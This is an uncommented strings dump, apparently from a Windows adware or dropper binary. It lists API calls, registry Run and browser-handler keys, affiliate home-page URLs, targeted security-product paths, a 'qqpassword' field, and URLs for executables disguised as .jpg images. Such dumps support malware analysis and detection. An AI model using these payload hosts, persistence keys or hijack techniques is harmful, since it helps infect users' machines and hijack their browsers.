C:\Program Files\Common Files\gswb_1454_7654_356.jpg
C:\Program Files\Common Files\KQ.exe
C:\Program Files\Common Files\KQ.jpg
C:\Program Files\Common Files\Microsoft Shared\1.reg
C:\Program Files\Common Files\Microsoft Shared\2345pack.ini
C:\Program Files\Common Files\Microsoft Shared\2345.txt
C:\Program Files\Common Files\Microsoft Shared\acbbb.txt
C:\Program Files\Common Files\Microsoft Shared\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\Common Files\Microsoft Shared\pp3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\Common Files\qhse_7654_5943.exe
C:\Program Files\Common Files\qhse_7654_5943.jpg
C:\Program Files\Common Files\qq.exe
C:\Program Files\Common Files\td1.exe
C:\Program Files\Common Files\td.exe
C:\Program Files\Common Files\Tiandi_6733.exe
C:\Program Files\Common Files\uc.exe
C:\Program Files\Common Files\uc.jpg
C:\Program Files\Doyo\DyUninstall.exe
C:\Program Files\GSInput
C:\Program Files\GSInput\3.0.1.0512\uninst.exe
C:\Program Files\gssoft\gswb\2.8.1.1120\uninst.exe
C:\Program Files\HaoZip
C:\Program Files\HaoZip\Uninstall.exe
C:\Program Files\iQIYI\QiyiInstaller.exe
C:\Program Files\JJ
C:\Program Files\kingsoft\kingsoft antivirus\uni0nst.exe
C:\Program Files\liebao\liebao.exe
C:\Program Files\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\PPStream\unpps.exe
C:\Program Files\SogouExplorer\SogouExplorer.exe
C:\Program Files\Tencent\QQPCMgr\8.8.10756.232\Uninst.exe
C:\Program Files\UCBrowser\UCBrowser.exe
C:\Program Files\UCBrowser\UCBrowser.exe --wow-launch-from=desktop
C:\Program Files\UCBrowser\Uninstall.exe
C:\Program Files\yyfm0529\201407051412\Unins.exe
CreateBitmap
CreateCompatibleDC
CreateDialogIndirectParamA
CreateDIBSection
CreateDirectoryA
CreateEventA
CreateFileA
CreateMenu
CreateMutexW
CreatePatternBrush
CreatePopupMenu
CreateProcessA
CreateRoundRectRgn
CreateShortcut
CreateSolidBrush
CreateThread
CreateToolhelp32Snapshot
CreateWaitableTimerA
CreateWindowExA
CResourceException
- CRT not initialized
CryptAcquireContextA
CryptCreateHash
CryptDestroyHash
CryptGetHashParam
CryptHashData
CryptReleaseContext
CTempDC
CTempGdiObject
CTempMenu
CTempWnd
C:\user\All Users\
CUserException
C:\users\administrator\
C:\users\Administrator\
C:\users\Administrator\Application Data\360se6\Application\360se.exe
C:\users\Administrator\Application Data\360se6\Application\6.3.1.153\installer\setup.exe
C:\Users\Administrator\Desktop\
C:\users\Administrator\Local Settings\Application Data\Kingsoft\WPS Office\9.1.0.4463\utility\uninst.exe
C:\users\Administrator\Local Settings\Temp\bluefiles
C:\users\All Users\
C:\users\All Users\Desktop\
CWinApp
C:\WINDOWS\system32\taskmgr.exe
C:\WINDOWS\system\360se
C:\WINDOWS\system\360.txt
C:\WINDOWS\system\ADSafe
C:\Windows\system\APP
C:\Windows\system\APPP
C:\WINDOWS\system\baidusd2.txt
C:\WINDOWS\system\baiduse.txt
C:\WINDOWS\system\baiduweishi2.txt
C:\WINDOWS\system\guan2.txt
C:\WINDOWS\system\KQ.txt
C:\WINDOWS\system\leibao
C:\WINDOWS\system\uc
C:\WINDOWS\system\uc.txt
CWinThread
Daemon.exe
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
`default constructor closure'
DefMDIChildProcA
DefWindowProcA
DefWindowProcW
 delete
 delete[]
Delete
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
Desk=0
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
DispatchMessageA
DISPLAY
DLL ERROR
DocumentPropertiesA
DOMAIN error
D:\Program Files\Tencent\QQPCMgr\8.12.11701.227\Uninst.exe
D:\Program Files\Tencent\QQPCMgr\8.8.10756.232\Uninst.exe
DragAcceptFiles
DragFinish
DragQueryFileA
DrawMenuBar
DrawTextA
D$<SUV
D$Tj\P
D$,WPQR
D$$WPV
D$XQRP
`dynamic atexit destructor for '
`dynamic initializer for '
&Edit,0,2
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
Embedded Object
Embed Source
EnableMenuItem
EnableWindow
EncodePointer
EndDialog
EndPaint
EnterCriticalSection
EnumDisplayMonitors
Escape
ExitProcess
Explorer=1
ExtCreateRegion
ExtTextOutA
F,_^][
@@f98u
f9z.vk
__fastcall
February
FileName
FileNameW
FillRect
FindClose
FindFirstFileA
FindFirstFileW
FindNextFileA
FindResourceA
FindWindowA
FindWindowExA
- floating point not loaded
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
Friday
frmProgress
GAIsProcessorFeaturePresent
gdi32.dll
GDI32.dll
GetACP
GetActiveWindow
GetAsyncKeyState
GetCapture
GetClassInfoA
GetClassLongA
GetClassNameA
GetClientRect
GetClipBox
GetCommandLineA
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThread
GetCurrentThreadId
GetCursorPos
GetDesktopWindow
GetDeviceCaps
GetDlgCtrlID
GetDlgItem
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesW
GetFileSize
GetFileType
GetFocus
GetFolder
GetForegroundWindow
GetFullPathNameW
GetKeyState
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMenu
GetMenuCheckMarkDimensions
GetMenuDefaultItem
GetMenuInfo
GetMenuItemCount
GetMenuItemID
GetMenuItemInfoA
GetMenuItemRect
GetMenuState
GetMenuStringA
GetMessageA
GetMessagePos
GetMessageTime
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetMonitorInfoA
GetNativeSystemInfo
GetNextDlgTabItem
GetObjectA
GetOEMCP
GetParent
GetPrivateProfileStringW
GetProcAddress
GetProcessHeap
GetProcessVersion
GetProcessWindowStation
GetPropA
GetStartupInfoA
GetStartupInfoW
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetSystemTimeAsFileTime
GetTempPathA
GetTickCount
GetTopWindow
GetUserDefaultLCID
GetUserObjectInformationA
GetVersion
GetVersionExA
GetWindow
GetWindowLongA
GetWindowPlacement
GetWindowRect
GetWindowsDirectoryA
GetWindowTextA
GetWindowTextLengthA
GetWindowThreadProcessId
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFlags
GlobalFree
GlobalGetAtomNameA
GlobalHandle
__GLOBAL_HEAP_SELECTED
GlobalLock
GlobalReAlloc
GlobalUnlock
Google Chrome
Google Chrome.lnk
GrayStringA
`h````
\hao123
HaoZip=1
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
`h`hhh
HH:mm:ss
HHtpHHtl
_Hide.exe
HideProgress=0
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UCBrowserSvc
HKEY_USERS
H:mm:ss
Host: 
HSVHWtgHHtF
htmlfile\shell\
htmlfile\shell\e\command\
http://
HTTP/1.0
http://1.soso56.com/gswb_1454_7654_356.jpg
HttpAddRequestHeadersA
http://d2.freep.cn/3tb_140810210616ab0y536124.jpg
http://d2.freep.cn/3tb_140822092250fy1p538112.jpg
http://d2.freep.cn/3tb_140822174145xr9r538112.jpg
http://d3.freep.cn/3tb_140818092254lkmy537913.jpg
http://d3.freep.cn/3tb_1408220915588uva538112.jpg
http://d3.freep.cn/3tb_140822172706ahch538112.jpg
http://d3.freep.cn/3tb_140822173106dyxl538112.jpg
http://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
HTTP\shell\
HTTP\shell\e\command\
https\shell\
https\shell\e\command\
http://www.2345.com/?k98792151
http://www.duba.com/?un_2_445816
http://www.qq.com
http://www.soso56.com/asdqw_3104-48740.jpg
hWj@_;
_hypot
IEFav=1
IEHome=1
InitCommonControlsEx
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InsertMenuA
InterlockedDecrement
InterlockedIncrement
InternetCheckConnectionA
InternetCloseHandle
InternetConnectA
Internet     Explorer.lnk
Internet    Explorer.lnk
InternetOpenA
InternetOpenUrlA
InternetReadFile
InternetShortcut\shell\
InternetShortcut\shell\e\command\
InvalidateRect
invalid string position
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsDebuggerPresent
IsDialogMessageA
IsIconic
IsValidCodePage
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
j8j ^V
JanFebMarAprMayJunJulAugSepOctNovDec
January
kernel32
KERNEL32
kernel32.dll
Kernel32.dll
KERNEL32.dll
KERNEL32.DLL
KillTimer
KuGou=0
KuWo=0
L$0_^]
L$49l$4}
\$L9|$
LCMapStringA
LCMapStringW
L$DWQV
LeaveCriticalSection
Link Source
Link Source Descriptor
LoadBitmapA
LoadCursorA
LoadIconA
LoadLibraryA
LoadMenuA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LocalReAlloc
LocalSize
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
LockResource
L$$PhP
L$$PQh
L$<RPQ
L$,ShT
L$,ShX
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpyn
lstrcpynA
lstrlenA
lstrlenW
l$ UPVQ
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
MapWindowPoints
M/d/yy
MenuItemFromPoint
MessageBoxA
mhtmlfile\shell\
mhtmlfile\shell\e\command\
Microsoft Visual C++ Runtime Library
.mixcrt
MM/dd/yy
ModifyMenuA
Module32First
Monday
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
MoveFileA
MoveFileExA
MoveWindow
Movie=0
@Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
mscoree.dll
MsgWaitForMultipleObjects
MS Sans Serif
MS Shell Dlg
__MSVCRT_HEAP_SELECT
MulDiv
MultiByteToWideChar
\MusicFM.lnk
n0SSSSU
Native
 new[]
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
NTDLL.DLL
NtReadVirtualMemory
(null)
Object Descriptor
ObjectLink
October
OffsetViewportOrgEx
ole32.dll
OLEAUT32.dll
oledlg.dll
OleFlushClipboard
OleInitialize
OleIsCurrentClipboard
OLEPRO32.DLL
OleRun
OleUninitialize
`omni callsig'
&Open,0,2
OpenEventA
OpenFile
OpenPrinterA
OpenProcess
operator
OwnerLink
__pascal
Path=C:\Program Files\
PathFileExistsA
PathFindFileNameA
PathIsDirectoryA
PathMatchSpecA
PathRemoveFileSpecA
.PAVCException@@
.PAVCMemoryException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCUserException@@
PCMgr=0
PCMgr=1
PeekMessageA
Ph_^][Y
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
PostMessageA
PostQuitMessage
PostThreadMessageA
PPPPhd
PPPPPPPP
ppxxxx
PreviewPages
Process32First
Process32Next
Program: 
program internal error number is %d. 
<program name unknown>
PtInRect
__ptr64
PtVisible
- pure virtual function call
PWVWWW
&qqpassword=  
QQPCTray.exe
QQSVWd
QQSVWh
QQSVWj
QSUVWj
QueryPerformanceCounter
RaiseException
RARCloseArchive
RAROpenArchiveEx
RARProcessFile
RARReadHeader
RARSetCallback
RARSetPassword
`.rdata
ReadProcessMemory
RectVisible
REG_BINARY - 
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegDisableReflectionKey
REG_DWORD - DWORD
Regedit 
RegEnableReflectionKey
RegEnumKeyA
RegEnumValueA
RegFlushKey
RegisterClassA
RegisterClassExA
RegisterClipboardFormatA
RegisterHotKey
RegisterWindowMessageA
REG_MULTI_SZ - 
REG_NONE - 
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
REG_REG_EXPAND_SZ - 
RegSetValueExA
REG_SZ - 
ReleaseDC
RemoveDirectoryA
RemoveMenu
RemovePropA
RestoreDC
__restrict
RichEdit Text and Objects
Rich Text Format
RPWWWj
RtlMoveMemory
RtlUnwind
runtime error 
Runtime Error!
:"%s".
Safe=0
Saturday
SaveDC
`scalar deleting destructor'
ScaleViewportExtEx
ScaleWindowExtEx
ScreenToClient
scripting.FileSystemObject
SelectObject
SendDlgItemMessageA
SendMessageA
September
SetActiveWindow
SetBkColor
SetClassLongA
SetCursor
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetMapMode
SetMenu
SetMenuDefaultItem
SetMenuInfo
SetMenuItemBitmaps
SetMenuItemInfoA
SetParent
SetPropA
SetRect
SetStdHandle
SetTextColor
SetTimer
Settings
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWaitableTimer
SetWindowExtEx
SetWindowLongA
SetWindowPos
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
shell32.dll
SHELL32.dll
ShellExecuteExW
Shell_NotifyIconA
Shell_TrayWnd
SHGetSpecialFolderPathA
shlwapi.dll
Shlwapi.dll
SHLWAPI.dll
ShowWindow
ShowWindowAsync
SING error
sO;>|C;~
software
Software\Microsoft\Internet Explorer\Main
SoHu=0
s[S;7|G;w
SS@SSPVSS
_SSSSU
StartAuto=1
Start Page
__stdcall
StretchBlt
`string'
string too long
Sunday
SunMonTueWedThuFriSat
SusWnd
SysPager
System
SystemParametersInfoA
SystemRoot
\SystemRoot
t0WWWWW
t@_^]3
t'9|$pt
t	9p$u
t^9(uZ
TabbedTextOutA
TargetPath
TaskbarCreated
taskmgr.exe
tb9} u
tD9_Pt?
tD9(u@
tehDL@
\TemporaryFile
\....\TemporaryFile
TerminateProcess
TextOutA
This application has requested the Runtime to terminate it in an unusual way.
__thiscall
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
t>Ht Ht
t+Ht$Ht
Thursday
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
T$LURV
ToolbarWindow32
tq9w(tlSj
tR99u2
TrackMouseEvent
TrackPopupMenu
TranslateAcceleratorA
TranslateMessage
TrayNotifyWnd
t#SSUP
+ttHHtd
t.;t$$t(
Tuesday
;t$,v-
t$$VSS
tvWWWWU
T$$WRV
t+WWVPV
 Type Descriptor'
`typeof'
`udt returning'
uf9=|VG
uL9=|+A
- unable to initialize heap
- unable to open console device
__unaligned
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UnhookWindowsHookEx
\uninst.exe
Unknown exception
unrar.dll
UnregisterClassA
UnregisterHotKey
UpdateWindow
UQPXY]Y[
uRFGHt
URPQQhl
user32
USER32
user32.dll
User32.dll
USER32.dll
USER32.DLL
User-Agent: DownJet1.0
\$(UVW
ValidateRect
`vbase destructor'
`vbtable'
VC20XC00U
`vcall'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`vftable'
VirtualAlloc
VirtualAllocEx
`virtual displacement map'
VirtualFree
VirtualFreeEx
VirtualQueryEx
v	N+D$
,&[vrH
VWhkWC
WaitForSingleObject
Wednesday
WideCharToMultiByte
WinExec
WinHelpA
wininet.dll
WININET.dll
WINSPOOL.DRV
woqqqainima de a
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
\WPS Office 
(wqt\HHtS
WriteConsoleA
WriteConsoleW
WriteFile
WritePrivateProfileStringA
wshom.ocx
WshShell
wsprintfA
WTWindow
WwktZ=
xppwpp
xpxxxx
>=Yt/j
_^][YY
\yyfm0529
YYu-9D$
YYuTVWh
Z9K|uU
ZwQueryInformationProcess